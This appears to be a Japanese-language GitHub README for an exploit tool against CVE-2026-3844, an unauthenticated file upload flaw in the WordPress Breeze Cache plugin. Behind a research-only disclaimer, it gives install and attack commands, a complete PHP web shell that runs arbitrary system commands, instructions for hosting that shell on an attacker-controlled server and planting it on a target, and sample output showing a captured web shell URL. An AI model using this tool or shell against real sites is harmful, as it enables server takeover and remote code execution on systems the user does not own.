
WordPress - Breeze Cache <= 2.4.4 - 未認証の任意ファイルアップロード
このツールは教育およびセキュリティ研究目的のみで提供されています。
コンピュータシステムへの不正アクセスは違法です。このツールは、所有しているシステム、
または明示的なテスト許可を得たシステムでのみ使用してください。
作者は、このソフトウェアの誤用または損害について一切の責任を負いません。
CVE-2026-3844 は、WordPress 用 Breeze Cache プラグイン(バージョン ≤ 2.4.4)における重大な未認証の任意ファイルアップロード脆弱性です。このプラグインはコメント内の srcset パラメータを適切に検証しないため、リモートの攻撃者が悪意のあるファイル(ウェブシェルを含む)をサーバーにアップロードできます。
この脆弱性は、Breeze の Gravatar キャッシュ機能を悪用します。特別に細工されたリモートファイル URL を含む srcset パラメータを持つコメントが投稿されると、Breeze はファイルをダウンロードして以下の場所にローカルに保存します:
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]
前提条件: Breeze 設定で「Host Files Locally - Gravatars」オプションが有効になっている必要があります。
# リポジトリをクローン
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# 依存関係をインストール
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://target.com
# 悪用せずにターゲットが脆弱かどうかを確認
python3 CVE-2026-3844.py -u http://target.com --check-only
# カスタムペイロード URL を使用
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php
# 出力をファイルに保存
python3 CVE-2026-3844.py -u http://target.com -o shells.txt
# 応答の遅いターゲットのタイムアウトを延長
python3 CVE-2026-3844.py -u http://target.com --timeout 30
| 引数 | 説明 |
|---|---|
-u, --url | ターゲット URL(必須) |
-p, --payload | リモートペイロード URL |
--timeout | リクエストタイムアウト(秒)(デフォルト: 15) |
--check-only | ターゲットが脆弱かどうかのみ確認 |
-o, --output | シェル URL をファイルに保存 |
独自のウェブシェル(shell.php)を作成します:
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
アクセス可能な場所にホストし、次を使用します:
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php
このエクスプロイトは、アップロードされたファイル内の検証文字列 4356452d323032362d33383434(「CVE-2026-3844」の16進エンコード)を自動的にチェックし、悪用が成功したことを確認します。
[*] PHASE 1: VULNERABILITY ASSESSMENT
[*] Checking Breeze plugin version...
[+] Target VULNERABLE (Breeze v2.4.4)
[*] PHASE 2: EXPLOITATION
[!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED
[*] Step 1: Sending malicious comment...
[+] Comment posted successfully
[*] Step 2: Waiting for Breeze to cache the file...
[*] Step 3: Checking for uploaded file...
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
[✓] STATUS: SUCCESS
[✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # メインのエクスプロイトスクリプト
├── README.md # このファイル
└── LICENSE # MIT ライセンス
このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。
このツールが役立つと思われた場合は、GitHub でスター ⭐ を付けてください!